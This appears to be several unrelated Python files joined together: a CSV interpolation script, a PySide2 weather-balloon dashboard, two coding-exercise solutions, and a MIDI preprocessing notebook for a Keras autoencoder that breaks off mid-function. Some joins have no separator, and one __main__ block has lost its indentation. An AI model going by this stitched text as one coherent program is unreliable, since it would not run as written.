            'ImageFile': image_path
        })
    print('--------------------------------')
    print('Missed files: {}'.format(missed))
    f_velocities.close()
    f_images.close()
    # split_test_training_data([result_velocities_file_path, result_images_file_path], row_counter)
def run(
    velocities_file_path,
    images_file_path,
    result_velocities_file_path,
    result_images_file_path,
    images_folder_path):
    """Load both input CSVs and produce the interpolated result files via process().

    NOTE(review): the multi-character delimiter ', ' forces pandas onto the
    python parsing engine (with a ParserWarning) — confirm the input files
    really use comma+space.
    """
    velocities = pd.read_csv(velocities_file_path, delimiter=', ')
    images = pd.read_csv(
        images_file_path, delimiter=', ')
    # sys.exit()
    process(
        velocities,
        images,
        result_velocities_file_path,
        result_images_file_path,
        images_folder_path
    )
    print('------------------------------------')
    print('Successfully created the results!')
if __name__ == "__main__":
# parser = argparse.ArgumentParser()
# parser.add_argument("velocity", help="Path to the velocities file")
# parser.add_argument("images", help="Path to the images file")
# parser.add_argument(
# "result_velocities", help="Path to the result velocities file")
# parser.add_argument("result_images", help="Path to the result images file")
# parser.add_argument("images_folder", help="Path to the images folder")
# args = parser.parse_args()
# run(
# args.velocity,
# args.images,
# args.result_velocities,
# args.result_images,
# args.images_folder
# )
base_path = '/home/rb/all_files/il_datasets/bc_test'
run(
os.path.join(base_path, 'moveOnSpline_vel_cmd.txt'),
os.path.join(base_path, 'images.txt'),
os.path.join(base_path, 'proc_vel.txt'),
os.path.join(base_path, 'proc_images.txt'),
os.path.join(base_path, 'images')) |
import os

from PySide2.QtCore import *
from PySide2.QtWidgets import *
from src.app.components.canvas import Canvas
from src.app.components.gauge import Gauge
from src.app.utils.styles import *
from src.app.components.constants import *
class DashboardWindow(object):
    """Hand-maintained, Qt-Designer-style UI builder for the dashboard window.

    setupUi() constructs the whole widget tree on `main_window` and shows it;
    retranslateUi() assigns every user-visible string.
    """

    def setupUi(self, main_window):
        """Build tab 1 (time/altitude graphs, gauge row, parameter checkboxes),
        tab 2 (data table, spec graph, visualization radio buttons), the menu
        and status bars, then show `main_window`.

        NOTE(review): os.path.join below needs `os` in scope — presumably
        re-exported by one of the star imports; confirm.
        """
        self.parameter_list = []
        if not main_window.objectName():
            main_window.setObjectName(u"MainWindow")
        main_window.resize(830, 520)
        self.actionTrack_Balloon = QAction(main_window)
        self.actionTrack_Balloon.setObjectName(u"actionTrack_Balloon")
        self.actionCreate_File = QAction(main_window)
        self.actionCreate_File.setObjectName(u"actionCreate_File")
        self.centralwidget = QWidget(main_window)
        self.centralwidget.setObjectName(u"centralwidget")
        self.gridLayout_2 = QGridLayout(self.centralwidget)
        self.gridLayout_2.setObjectName(u"gridLayout_2")
        self.verticalLayout_2 = QVBoxLayout()
        self.verticalLayout_2.setObjectName(u"verticalLayout_2")
        self.horizontalLayout_2 = QHBoxLayout()
        self.horizontalLayout_2.setObjectName(u"horizontalLayout_2")
        self.gridLayout_3 = QGridLayout()
        self.gridLayout_3.setObjectName(u"gridLayout_3")
        self.tabWidget = QTabWidget(self.centralwidget)
        self.tabWidget.setObjectName(u"tabWidget")
        self.tab = QWidget()
        self.tab.setObjectName(u"Graph Views")
        self.gridLayout = QGridLayout(self.tab)
        self.gridLayout.setObjectName(u"gridLayout")
        self.gridLayout_4 = QGridLayout()
        self.gridLayout_4.setObjectName(u"gridLayout_4")
        # ----------- Graph V/s Time -----------------
        self.graph_time = Canvas(parent=self.tab)
        self.gridLayout_4.addLayout(self.graph_time, 0, 0, 1, 1)
        # ----------- Graph V/s Altitude -----------------
        self.graph_altitude = Canvas(parent=self.tab, )
        self.gridLayout_4.addLayout(self.graph_altitude, 0, 1, 1, 1)
        # ----------- Gauges -----------------
        # One gauge per telemetry channel, laid out in a single row; each uses
        # its own asset folder and min/max range from constants.
        self.gauge_row = QHBoxLayout()
        self.gauge_row.setObjectName(u"gauge_row")
        self.pressure_gauge = Gauge(
            parent=self.tab,
            assets_path=os.path.join(GAUGE_PATH, "pressure"),
            minimum=PRESSURE_MINIMUM,
            maximum=PRESSURE_MAXIMUM
        )
        self.gauge_row.addLayout(self.pressure_gauge)
        self.temperature_gauge = Gauge(
            parent=self.tab,
            assets_path=os.path.join(GAUGE_PATH, "temperature"),
            minimum=TEMPERATURE_MINIMUM,
            maximum=TEMPERATURE_MAXIMUM
        )
        self.gauge_row.addLayout(self.temperature_gauge)
        self.humidity_gauge = Gauge(
            parent=self.tab,
            assets_path=os.path.join(GAUGE_PATH, "humidity"),
            minimum=HUMIDITY_MINIMUM,
            maximum=HUMIDITY_MAXIMUM
        )
        self.gauge_row.addLayout(self.humidity_gauge)
        self.wind_speed_gauge = Gauge(
            parent=self.tab,
            assets_path=os.path.join(GAUGE_PATH, "wind_speed"),
            minimum=WIND_SPEED_MINIMUM,
            maximum=WIND_SPEED_MAXIMUM
        )
        self.gauge_row.addLayout(self.wind_speed_gauge)
        self.wind_direction_gauge = Gauge(
            parent=self.tab,
            assets_path=os.path.join(GAUGE_PATH, "wind_direction"),
            minimum=WIND_DIRECTION_MINIMUM,
            maximum=WIND_DIRECTION_MAXIMUM
        )
        self.gauge_row.addLayout(self.wind_direction_gauge)
        self.altitude_gauge = Gauge(
            parent=self.tab,
            assets_path=os.path.join(GAUGE_PATH, "altitude"),
            minimum=ALTITUDE_MINIMUM,
            maximum=ALTITUDE_MAXIMUM
        )
        self.gauge_row.addLayout(self.altitude_gauge)
        self.gridLayout_4.addLayout(self.gauge_row, 1, 0, 1, 3)
        # Graph Index
        # Checkbox group selecting which parameters are plotted.
        self.parameter_group = QGroupBox(self.tab)
        self.parameter_group.setObjectName(u"parameter_group")
        self.parameter_group.setMinimumSize(QSize(150, 230))
        self.parameter_group.setMaximumSize(QSize(150, 230))
        self.layoutWidget_2 = QWidget(self.parameter_group)
        self.layoutWidget_2.setObjectName(u"layoutWidget_2")
        self.layoutWidget_2.setGeometry(QRect(10, 30, 116, 176))
        self.verticalLayout = QVBoxLayout(self.layoutWidget_2)
        self.verticalLayout.setObjectName(u"verticalLayout")
        self.verticalLayout.setContentsMargins(0, 0, 0, 0)
        self.temperature_check = QCheckBox(self.layoutWidget_2)
        self.temperature_check.setChecked(True)
        self.temperature_check.setStyleSheet(temperature_checkbox_indicator)
        self.verticalLayout.addWidget(self.temperature_check)
        self.pressure_check = QCheckBox(self.layoutWidget_2)
        self.pressure_check.setStyleSheet(pressure_checkbox_indicator)
        self.verticalLayout.addWidget(self.pressure_check)
        self.humidity_check = QCheckBox(self.layoutWidget_2)
        self.humidity_check.setChecked(True)
        self.humidity_check.setStyleSheet(humidity_checkbox_indicator)
        self.verticalLayout.addWidget(self.humidity_check)
        self.wind_speed_check = QCheckBox(self.layoutWidget_2)
        self.wind_speed_check.setStyleSheet(wind_speed_checkbox_indicator)
        self.verticalLayout.addWidget(self.wind_speed_check)
        self.altitude_check = QCheckBox(self.layoutWidget_2)
        self.altitude_check.setStyleSheet(altitude_checkbox_indicator)
        self.verticalLayout.addWidget(self.altitude_check)
        self.gridLayout_4.addWidget(self.parameter_group, 0, 2, 1, 1)
        self.gridLayout.addLayout(self.gridLayout_4, 0, 0, 1, 1)
        self.tabWidget.addTab(self.tab, "")
        # ----------- Tab 2: raw data table + spec graph -----------------
        self.tab_2 = QWidget()
        self.tab_2.setObjectName(u"tab_2")
        self.gridLayout_5 = QGridLayout(self.tab_2)
        self.gridLayout_5.setObjectName(u"gridLayout_5")
        self.table = QTableWidget(self.tab_2)
        if (self.table.columnCount() < 6):
            self.table.setColumnCount(6)
        __qtablewidgetitem = QTableWidgetItem()
        self.table.setHorizontalHeaderItem(0, __qtablewidgetitem)
        __qtablewidgetitem1 = QTableWidgetItem()
        self.table.setHorizontalHeaderItem(1, __qtablewidgetitem1)
        __qtablewidgetitem2 = QTableWidgetItem()
        self.table.setHorizontalHeaderItem(2, __qtablewidgetitem2)
        __qtablewidgetitem3 = QTableWidgetItem()
        self.table.setHorizontalHeaderItem(3, __qtablewidgetitem3)
        __qtablewidgetitem4 = QTableWidgetItem()
        self.table.setHorizontalHeaderItem(4, __qtablewidgetitem4)
        __qtablewidgetitem5 = QTableWidgetItem()
        self.table.setHorizontalHeaderItem(5, __qtablewidgetitem5)
        self.table.setObjectName(u"table")
        self.table.setMaximumSize(QSize(600, 16777215))
        self.gridLayout_5.addWidget(self.table, 0, 0, 1, 1)
        self.spec_graph = Canvas(parent=self.tab_2)
        self.gridLayout_5.addLayout(self.spec_graph, 0, 1, 1, 1)
        # Radio group choosing which thermodynamic diagram to render.
        self.visualization_group = QGroupBox(self.tab_2)
        self.visualization_group.setObjectName(u"visualization_group")
        self.visualization_group.setMinimumSize(QSize(100, 150))
        self.visualization_group.setMaximumSize(QSize(200, 150))
        self.layoutWidget = QWidget(self.visualization_group)
        self.layoutWidget.setObjectName(u"layoutWidget")
        self.layoutWidget.setGeometry(QRect(10, 30, 114, 112))
        self.verticalLayout_3 = QVBoxLayout(self.layoutWidget)
        self.verticalLayout_3.setObjectName(u"verticalLayout_3")
        self.verticalLayout_3.setContentsMargins(0, 0, 0, 0)
        self.skewt_check = QRadioButton(self.layoutWidget)
        self.skewt_check.setObjectName(u"skewt_check")
        self.verticalLayout_3.addWidget(self.skewt_check)
        self.tphi_check = QRadioButton(self.layoutWidget)
        self.tphi_check.setObjectName(u"tphi_check")
        self.verticalLayout_3.addWidget(self.tphi_check)
        self.stuve_check = QRadioButton(self.layoutWidget)
        self.stuve_check.setObjectName(u"stuve_check")
        self.verticalLayout_3.addWidget(self.stuve_check)
        self.hodograph_check = QRadioButton(self.layoutWidget)
        self.hodograph_check.setObjectName(u"hodograph_check")
        self.verticalLayout_3.addWidget(self.hodograph_check)
        self.gridLayout_5.addWidget(self.visualization_group, 0, 2, 1, 1)
        self.tabWidget.addTab(self.tab_2, "")
        self.gridLayout_3.addWidget(self.tabWidget, 0, 0, 2, 1)
        self.horizontalLayout_2.addLayout(self.gridLayout_3)
        self.verticalLayout_2.addLayout(self.horizontalLayout_2)
        self.gridLayout_2.addLayout(self.verticalLayout_2, 0, 0, 1, 1)
        main_window.setCentralWidget(self.centralwidget)
        # ------------------ MENU BAR -------------------
        self.menubar = QMenuBar(main_window)
        self.menubar.setObjectName(u"menubar")
        self.menubar.setGeometry(QRect(0, 0, 830, 22))
        # ---------------- MENU Visualization --------------
        self.menuVisualization = QMenu(self.menubar)
        self.menuVisualization.setObjectName(u"menuVisualization")
        # ---------------- MENU Files --------------
        self.menuFiles = QMenu(self.menubar)
        self.menuFiles.setObjectName(u"menuFiles")
        main_window.setMenuBar(self.menubar)
        self.statusbar = QStatusBar(main_window)
        self.statusbar.setObjectName(u"statusbar")
        main_window.setStatusBar(self.statusbar)
        self.menubar.addAction(self.menuVisualization.menuAction())
        self.menuVisualization.addAction(self.actionTrack_Balloon)
        self.menubar.addAction(self.menuFiles.menuAction())
        self.menuFiles.addAction(self.actionCreate_File)
        self.retranslateUi(main_window)
        self.tabWidget.setCurrentIndex(0)
        QMetaObject.connectSlotsByName(main_window)
        main_window.show()

    def retranslateUi(self, MainWindow):
        """Assign all user-visible strings (titles, labels, headers)."""
        MainWindow.setWindowTitle(QCoreApplication.translate(
            "MainWindow", u"MainWindow", None))
        self.actionTrack_Balloon.setText(
            QCoreApplication.translate("MainWindow", u"Track Balloon", None))
        self.actionCreate_File.setText(
            QCoreApplication.translate("MainWindow", u"NetCDF", None))
        self.temperature_check.setText(
            QCoreApplication.translate("MainWindow", u"Temperature", None))
        self.pressure_check.setText(
            QCoreApplication.translate("MainWindow", u"Pressure", None))
        self.humidity_check.setText(
            QCoreApplication.translate("MainWindow", u"Humidity", None))
        self.wind_speed_check.setText(
            QCoreApplication.translate("MainWindow", u"WindSpeed", None))
        self.altitude_check.setText(
            QCoreApplication.translate("MainWindow", u"Altitude", None))
        self.tabWidget.setTabText(self.tabWidget.indexOf(
            self.tab), QCoreApplication.translate("MainWindow", u"Tab 1", None))
        self.visualization_group.setTitle(
            QCoreApplication.translate("MainWindow", u"Visualization", None))
        self.parameter_group.setTitle(
            QCoreApplication.translate("MainWindow", u"Parameters", None))
        self.skewt_check.setText(
            QCoreApplication.translate("MainWindow", u"Skew-T", None))
        self.tphi_check.setText(
            QCoreApplication.translate("MainWindow", u"T-Phi", None))
        self.stuve_check.setText(
            QCoreApplication.translate("MainWindow", u"Stuve", None))
        self.hodograph_check.setText(
            QCoreApplication.translate("MainWindow", u"Hodograph", None))
        # Table column headers: time, pressure, temperature, humidity,
        # wind speed, wind direction.
        ___qtablewidgetitem = self.table.horizontalHeaderItem(0)
        ___qtablewidgetitem.setText(
            QCoreApplication.translate("MainWindow", u"Time[s]", None))
        ___qtablewidgetitem1 = self.table.horizontalHeaderItem(1)
        ___qtablewidgetitem1.setText(
            QCoreApplication.translate("MainWindow", u"P[hPa]", None))
        ___qtablewidgetitem2 = self.table.horizontalHeaderItem(2)
        ___qtablewidgetitem2.setText(
            QCoreApplication.translate("MainWindow", u"T[C]", None))
        ___qtablewidgetitem3 = self.table.horizontalHeaderItem(3)
        ___qtablewidgetitem3.setText(
            QCoreApplication.translate("MainWindow", u"Hu[%]", None))
        ___qtablewidgetitem4 = self.table.horizontalHeaderItem(4)
        ___qtablewidgetitem4.setText(
            QCoreApplication.translate("MainWindow", u"Ws[m/s]", None))
        ___qtablewidgetitem5 = self.table.horizontalHeaderItem(5)
        ___qtablewidgetitem5.setText(
            QCoreApplication.translate("MainWindow", u"Wd[]", None))
        self.tabWidget.setTabText(self.tabWidget.indexOf(
            self.tab_2), QCoreApplication.translate("MainWindow", u"Tab 2", None))
        self.menuVisualization.setTitle(
            QCoreApplication.translate("MainWindow", u"Visualization", None))
        self.menuFiles.setTitle(
            QCoreApplication.translate("MainWindow", u"Files", None))
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 14 20:12:21 2020
@author: Soham Shah
"""
class Solution:
    def arrangeCoins(self, n: int) -> int:
        """Return the number of complete staircase rows buildable from n coins.

        Row k needs k coins, so k complete rows need k*(k+1)/2 coins. The
        original scanned rows linearly; this solves k^2 + k - 2n <= 0 exactly
        with an integer square root (no float error), in O(1) arithmetic on
        machine-sized n.
        """
        from math import isqrt  # local import: the file has no import section
        return (isqrt(8 * n + 1) - 1) // 2
from binarytree import Node as Treenode
class Solution(object):
    """Print every downward path in a binary tree whose values sum to k.

    NOTE: Python 2 code (print statements, xrange) — do not run under Python 3.
    """
    def __init__(self):
        # Stack of node values along the current root-to-node path.
        self.path = []
    def k_path_sum(self, root, k):
        """DFS from `root`; after visiting both children, scan the current
        path backwards and print any suffix (a path ending at this node)
        whose values sum to k."""
        if root is None:
            return
        #print 'Visiting {}'.format(root.value)
        self.path.append(root.value)
        self.k_path_sum(root.left, k)
        self.k_path_sum(root.right, k)
        #print 'Current path: {}'.format(self.path)
        # Accumulate suffix sums from this node back toward the root.
        currsum = 0
        for i in reversed(xrange(len(self.path))):
            currsum += self.path[i]
            if currsum == k:
                print self.path[i:]
        # Backtrack before returning to the parent.
        self.path.pop()
# Build a small sample tree and print every path that sums to 5.
root = Treenode(1)
root.left = Treenode(3)
root.left.left = Treenode(2)
root.left.right = Treenode(1)
root.left.right.left = Treenode(1)
root.right = Treenode(-1)
root.right.left = Treenode(4)
root.right.left.left = Treenode(1)
root.right.left.right = Treenode(2)
root.right.right = Treenode(5)
root.right.right.right = Treenode(2)
print(root)
S = Solution()
S.k_path_sum(root, 5)
# %%
#--------------------------------- Importing library ---------------------------------#
# OS, IO
from scipy.io import wavfile
import os, sys, shutil
# Sound Processing library
import librosa
from pydub import AudioSegment
# Midi Processing library
from mido import MidiFile, MidiTrack, Message, MetaMessage
from mido import tick2second, second2tick
# Math Library
import numpy as np
import random
# Display library
import IPython.display as ipd
import matplotlib.pyplot as plt
%matplotlib inline
plt.interactive(True)
import librosa.display
# Data Preprocessing
from keras.utils import to_categorical
from keras.preprocessing.text import Tokenizer
import sklearn
# Deep Learning Library
from keras.models import Model, Sequential
from keras.layers import Input, Conv1D, MaxPooling1D, Flatten, Dense, BatchNormalization, LSTM, Bidirectional, GRU
from keras.layers import Conv2D, MaxPooling2D, Dropout, UpSampling2D
from keras.optimizers import Adam, SGD
from keras.losses import categorical_crossentropy
from keras.metrics import categorical_accuracy
from keras.utils import Sequence
from keras.optimizers import Adam, SGD, RMSprop, Adadelta
from keras.callbacks import TensorBoard
from keras.callbacks import ModelCheckpoint
# Utils
# %%
#------------------------------- CONSTANTS ----------------------------------------#
# Sample MIDI files used in ad-hoc experiments below.
ata = 'test_data/Atavachron.mid'
noc = 'test_data/chno0902.mid'
noo = 'test_data/NoOneInTheWorld.mid'
DATA_FOLDER_PATH = 'dataset_piano_jazz'
# MIDI note numbers 21..108 (88 values).
MIDI_NOTES = np.arange(21, 109)
MIDI_NOTES_MAP = {
    '21': 'A0',
    '22': 'B0',  # NOTE(review): MIDI 22 is usually named A#0/Bb0 — confirm mapping.
    # TODO: Implement!
}
# Offset turning a MIDI pitch into a 0-based column index (lowest note -> 0).
MIDI_PITCH_TO_INDEX_CONSTANT = np.min(MIDI_NOTES)
# Number of space-separated fields in str() of a plain channel message.
NOTE_ATTRIBUTES = 5
# Scale factor applied when converting tick counts to coarse duration units.
TICK_SCALER = 0.1
N_CHANNELS = 1
testFile = 'dataset_piano_jazz/AHouseis.mid'
midi = MidiFile(testFile)
# # %%
# for fname in os.listdir(DATA_FOLDER_PATH):
# midi = MidiFile(os.path.join(DATA_FOLDER_PATH, fname))
# if midi.type == 0:
# print(midi.tracks)
# # %%
# isinstance(midi.tracks[0][0], MetaMessage)
# %%
# for fname in os.listdir(DATA_FOLDER_PATH):
# midi = MidiFile(os.path.join(DATA_FOLDER_PATH, fname))
# print(midi)
# %%
# len(str(midi.tracks[0][10]).split(" ")) != NOTE_ATTRIBUTES
# # %%
# len(str(midi.tracks[0][10]).split(" "))
# # %%
# 'channel' not in str(midi.tracks[0][10])
# # %%
# midi.tracks
# findNoteDuration(69, midi.tracks[0][3:])
# # %%
# def print_trackk(track):
# '''
# Do Something
# '''
# for i, msg in enumerate(track):
# print(msg)
# return
# # %%
# for i, msg in enumerate(a.tracks[1]):
# print(msg)
# # %%
# tpb = midi.ticks_per_beat
# tempo = midi.tracks[0][2].tempo
# time = midi.tracks[1][2].time
# %%
#------------ TEST ----------------#
# Collect note-on pitches and their absolute onset times (seconds) from track 1.
# BUG FIX: `tpb` and `tempo` were referenced but their definitions were
# commented out above, so this loop raised NameError. tpb comes from the
# file header; tempo starts at the MIDI default 500000 us/beat (120 bpm)
# and follows any set_tempo messages encountered in the track.
cnt = 0
notes = []
times = []
curr_time = 0
tpb = midi.ticks_per_beat
tempo = 500000
for j, message in enumerate(midi.tracks[1]):
    if message.type == 'set_tempo':
        tempo = message.tempo
    if isinstance(message, Message) and message.type == 'note_on':
        time = message.time
        sec = tick2second(time, tpb, tempo)
        notes.append(message.note)
        curr_time += sec
        times.append(curr_time)
# %%
# x = [0, 1, np.nan, 1, 2,np.nan, 1, 3]
# y = [56, 56, np.nan, 54, 54,np.nan, 45, 45]
# plt.plot(x, y)
# # %%
# nann = np.empty((2,10))
# nann[:] = np.nan
# # %%
# nann
# # %%
# max_line = 200
# for i in midi.play():
# print(i)
# if max_line == 0:
# break
# max_line -= 1
# # %%
# plt.figure(figsize=(14,6))
# plt.plot(ticks[:100], notes[:100])
# plt.show()
# # %%
# plt.figure(figsize=(30,8))
# plt.scatter(times[:100], notes[:100])
# %%
# Constants for instrument creation
# Flag stored in MEvent.patch[1]: True marks a percussion patch,
# False a melodic instrument patch.
PERC = True
INST = False
#------------------------------------------- Note Class ---------------------------------------------------#
class MEvent:
    """
    Event-style note representation, modeled on Haskell Euterpea's MEvent
    type (a piano-roll-like view of a score).  eTime is absolute time at a
    tempo of 120 bpm, so 0.25 is a quarter note at 128 bpm.  patch is a
    (patch number, PERC/INST flag) pair matching the Instrument class.
    """
    def __init__(self, eTime, pitch, duration, velocity=64, patch=(-1, INST)):
        self.eTime = eTime              # onset time
        self.pitch = pitch              # MIDI pitch number
        self.duration = duration        # note length
        self.velocity = velocity        # MIDI velocity (default 64)
        self.patch = patch              # (patch number, percussion flag)
        self.sTime = eTime + duration   # stop time = onset + duration

    def __str__(self):
        return (
            "MEvent(eTime: {}, pitch: {}, duration: {}, "
            "velocity: {}, patch: {}, sTime: {})"
        ).format(self.eTime, self.pitch, self.duration,
                 self.velocity, self.patch, self.sTime)

    def __repr__(self):
        return str(self)
# %%
#------------------------------ Data Preprocessing ---------------------------------#
def findNoteDuration(pitch, channel, events):
    '''
    Scan forward through MIDI events for the message that ends the given
    note: a note-off (or another note-on, since an instrument cannot play
    the same pitch twice simultaneously) with matching pitch and channel.
    Meta messages and messages without channel data are skipped.  If no
    terminator is found, the accumulated ticks to the end of the list are
    returned, truncating the note at the end of the track.
    :param pitch: MIDI pitch to match
    :param channel: channel the note was started on
    :param events: remaining messages after the note-on
    :return: tick count from the note-on to its terminator (or track end)
    '''
    ticks = 0
    for ev in events:
        if isinstance(ev, MetaMessage) or len(str(ev).split(" ")) != NOTE_ATTRIBUTES or 'channel' not in str(ev):
            continue
        ticks += ev.time
        if ev.channel == channel and ev.type in ("note_on", "note_off") and ev.note == pitch:
            return ticks
    return ticks
def tickToDur(ticks, resolution = 96):
    '''
    Convert a MIDI tick count into a coarse duration unit by scaling and
    rounding.  `resolution` (ticks_per_beat) is currently unused but kept
    so existing callers remain valid.
    :param ticks: number of ticks
    :param resolution: ticks_per_beat
    :return: rounded, scaled tick count
    '''
    return round(TICK_SCALER * float(ticks))
def getChannel(track):
    '''
    Determine the channel assigned to a track by inspecting its first event.
    ASSUMPTION: all events in the track share the same channel.
    Returns -1 for an empty track or when the first event is not a
    note_on/note_off message.
    :param track: list of MIDI messages
    :return: channel number, or -1
    '''
    if not track:
        return -1
    first = track[0]
    if first.type in ('note_on', 'note_off'):
        return first.channel
    return -1
def structurize_track(midi_track, ticks_per_beat, default_patch=-1):
    '''
    Convert a mido track into a list of MEvent objects plus the total
    (scaled) track duration.

    :param midi_track: sequence of mido messages
    :param ticks_per_beat: file resolution (unused by tickToDur today,
        kept for callers)
    :param default_patch: patch assumed until a program_change arrives
    :return: (list of MEvent, scaled total tick count)
    '''
    currChannel = -1
    currTick = 0
    currPatch = default_patch
    stred = []
    for i, msg in enumerate(midi_track):
        # Skip meta events and messages without channel data.
        if isinstance(msg, MetaMessage) or len(str(msg).split(" ")) != NOTE_ATTRIBUTES or 'channel' not in str(msg):
            continue
        _type = msg.type
        currChannel = msg.channel
        currTick += msg.time
        if _type == 'program_change':
            currPatch = msg.program
        elif _type == 'control_change':
            pass
        elif _type == 'note_on':
            # Look ahead for the matching note-off to get the duration.
            tick_duration = findNoteDuration(msg.note, currChannel, midi_track[(i+1):])
            event = MEvent(tickToDur(currTick), msg.note, tickToDur(tick_duration), msg.velocity, currPatch)
            stred.append(event)
        elif _type == 'time_signature':
            print("TO-DO: handle time signature event")
        elif _type == 'key_signature':
            print("TO-DO: handle key signature event")
        elif _type in ('note_off', 'end_of_track'):
            # note-offs are consumed by the look-ahead in findNoteDuration.
            pass
        else:
            # BUG FIX: this branch previously referenced an undefined name
            # `e`, and the preceding test read `_type == 'note_off' or
            # 'end_of_track'`, which is always truthy and made this branch
            # unreachable.  (A per-message debug print of the entire track
            # was also removed.)
            print("Unsupported event type (ignored): ", msg.type, vars(msg), msg)
    return stred, tickToDur(currTick)
def map_note_to_graph(stred):
    '''
    Flatten structured note events into plot-ready coordinate arrays.
    Each note contributes a (pitch, pitch, NaN) triple to x and an
    (onset, offset, NaN) triple to y; the NaN separates line segments.
    :param stred: list of MEvent-like objects
    :return x: pitch coordinates
    :return y: time coordinates
    '''
    if not stred:
        return [], []
    xs = []
    ys = []
    for ev in stred:
        xs.extend((ev.pitch, ev.pitch, np.nan))
        ys.extend((ev.eTime, ev.eTime + ev.duration, np.nan))
    return np.asarray(xs), np.asarray(ys)
def map_note_to_array(stred, max_tick):
    '''
    Render structured note events onto a (time x pitch) velocity grid.
    Overlapping notes accumulate their velocities.  Only rows 500..1499
    of the grid are returned, as nested Python lists.
    :param stred: list of MEvent-like objects
    :param max_tick: number of time rows to allocate
    :return: grid.tolist()[500:1500]
    '''
    grid = np.zeros(shape=(max_tick, MIDI_NOTES.shape[0]))
    for ev in stred:
        col = ev.pitch - MIDI_PITCH_TO_INDEX_CONSTANT
        grid[ev.eTime:ev.sTime, col] += ev.velocity
    return grid.tolist()[500:1500]
# %%
class DataGenerator(Sequence):
    """
    Keras Sequence that scans a folder for single-track (type 0) MIDI files
    and converts them into piano-roll arrays.

    :param data_path: (String) This is the base folder data.
    :param batch_size: (int32) Number of samples per batch.
    :param dim: (Tuple: (a, b, c)) 3D tuple shape of input dimension
    :param n_channels: (int32) Number of channel.
    :param n_classes: (int32) Number of classes.
    :param shuffle: (boolean) Specify whether or not you want to shuffle the data to be trained.

    NOTE(review): __data_generation/__len__/__getitem__ are still stubs
    returning None, so this class is not yet usable as a real Sequence.
    """
    def __init__(self, data_path, batch_size=32, dim=(128,1308), n_channels=1,
                 n_classes=10, shuffle=True, validation_split=0.1):
        """
        :var self.classes:
        :var self.labels:
        :var self.fname:
        :var self.data:
        :var self.dim:
        :var self.batch_size:
        :var self.list_IDs:
        :var self.n_channels:
        :var self.n_classes:
        :var self.shuffle:
        :var self.tokenizer:
        :var self.data_path:
        """
        self.fname = []          # paths of accepted (type 0) midi files
        self.data = []           # piano-roll inputs, filled by extract_data()
        self.y = []              # targets (same arrays as data)
        self.validation_split = validation_split
        self.data_size = 0
        self.data_shape = (None,None)
        self.data_path = data_path
        self.dim = dim
        self.batch_size = batch_size
        self.list_IDs = []
        self.n_channels = n_channels
        self.n_classes = n_classes
        self.shuffle = shuffle
        self.on_epoch_end()
        self.load_data()
    # NOTE(review): the string below is a free-floating expression, not a
    # docstring of load_data — consider moving it inside the method.
    """
    :param data_path: (String) The actual base folder of data
    """
    def load_data(self):
        # Record the path of every type-0 (single-track) MIDI file found.
        cnt = 0
        for i, _file in enumerate(os.listdir(self.data_path)):
            fname = os.path.join(self.data_path, _file)
            # TODO: Check if the data is good
            midi = MidiFile(fname)
            if midi.type == 0:
                print('{} has {} tracks'.format(fname, len(midi.tracks)))
                self.fname.append(fname)
                cnt +=1
        print('Found {} midi file with unique track in data folder!'.format(cnt))
    """
    Utilities method for classes
    :param filename: Name of the file
    """
    # NOTE(review): missing `self` — calling this on an instance raises
    # TypeError; the method is currently unused and unimplemented.
    def load_midifile(filename):
        return
    # Temp extract data
    def extract_data(self):
        # Convert every recorded file into a piano-roll array; inputs and
        # targets are the same array (autoencoder setup).
        for fname in self.fname:
            midi = MidiFile(fname)
            tpb = midi.ticks_per_beat
            print('Extracting {}'.format(fname))
            if midi.type == 0:
                # x, y = map_note_to_graph(structurize_track(midi.tracks[0], tpb))
                # arr = map_note_to_array(*structurize_track(track, tpb))
                st, maxTick = structurize_track(midi.tracks[0], tpb) # If type == 0 -> midi just have 1 track.
                arr = map_note_to_array(st, maxTick)
                self.data.append(arr)
                self.y.append(arr)
        # NOTE(review): axis=4 on a 3-D stack relies on old-numpy axis
        # clipping; axis=-1 is the safe spelling — confirm numpy version.
        self.data = np.expand_dims(np.asarray(self.data), axis=4)
        self.y = np.expand_dims(np.asarray(self.y), axis=4)
    def shuffle_data(self):
        # NOTE(review): shuffles only self.y, leaving self.data in the
        # original order — confirm this x/y de-pairing is intentional.
        for i in range(len(self.y) // 2):
            idx = random.randint(0, len(self.y) - 1)
            tmp = self.y[i]
            self.y[i] = self.y[idx]
            self.y[idx] = tmp
    def on_epoch_end(self):
        # Reshuffle index order between epochs when requested.
        self.indexes = np.arange(len(self.list_IDs))
        if self.shuffle == True:
            np.random.shuffle(self.indexes)
    def __data_generation(self, list_IDs_temp):
        # Stub: batch assembly not implemented yet.
        return
    def __len__(self):
        # Stub: should return the number of batches per epoch.
        return
    def __getitem__(self, index):
        # Stub: should return one (inputs, targets) batch.
        return
# %%
# Build the generator, then eagerly extract and shuffle the whole dataset.
dataGen = DataGenerator(DATA_FOLDER_PATH)
# %%
dataGen.extract_data()
dataGen.shuffle_data()
# %%
# x: piano-roll inputs, y: (shuffled) targets — see shuffle_data() note.
x = dataGen.data
y = dataGen.y
# # %%
# y.shape
# # %%
# list(dataGen.data[0])
# # %%
# plt.imshow(x[0,:,:,0])
#------------------------------------------- Dummy Datagen ---------------------------------#
class DummyGen(Sequence):
    """Skeleton Keras Sequence for quick pipeline experiments.

    NOTE(review): __len__/__getitem__ still return None, so the class is a
    scaffold only and cannot drive training yet.
    """
    def __init__(self, batch_size=32, dim=(None, None),
                 n_classes=10, shuffle=True, validation_split=0.1, n_channels=1):
        # BUG FIX: n_channels was referenced but never defined; it is now a
        # trailing keyword parameter (default 1) so existing callers work.
        self.data_shape = (None,None)
        self.dim = dim
        self.batch_size = batch_size
        self.list_IDs = []
        self.n_channels = n_channels
        self.n_classes = n_classes
        self.shuffle = shuffle
        self.on_epoch_end()
        self.load_data()
    def load_data(self):
        # BUG FIX: the original def had no body at all, which raised
        # IndentationError when the class was defined.
        return
    def on_epoch_end(self):
        # Reshuffle index order between epochs when requested.
        self.indexes = np.arange(len(self.list_IDs))
        if self.shuffle == True:
            np.random.shuffle(self.indexes)
    def __data_generation(self, list_IDs_temp):
        # Stub: batch assembly not implemented yet.
        return
    def __len__(self):
        # Stub: should return the number of batches per epoch.
        return
    def __getitem__(self, index):
        # Stub: should return one (inputs, targets) batch.
        return
# %%
#----------------------------------------- Models ----------------------------------#
def conv_autoencoder_1(shape=(None, MIDI_NOTES.shape[0], N_CHANNELS)):
    """1x1-conv autoencoder: three pool stages mirrored by three upsample
    stages; compiled with Adam(lr=10e-4) on mean squared error."""
    in_tensor = Input(shape=shape)
    h = in_tensor
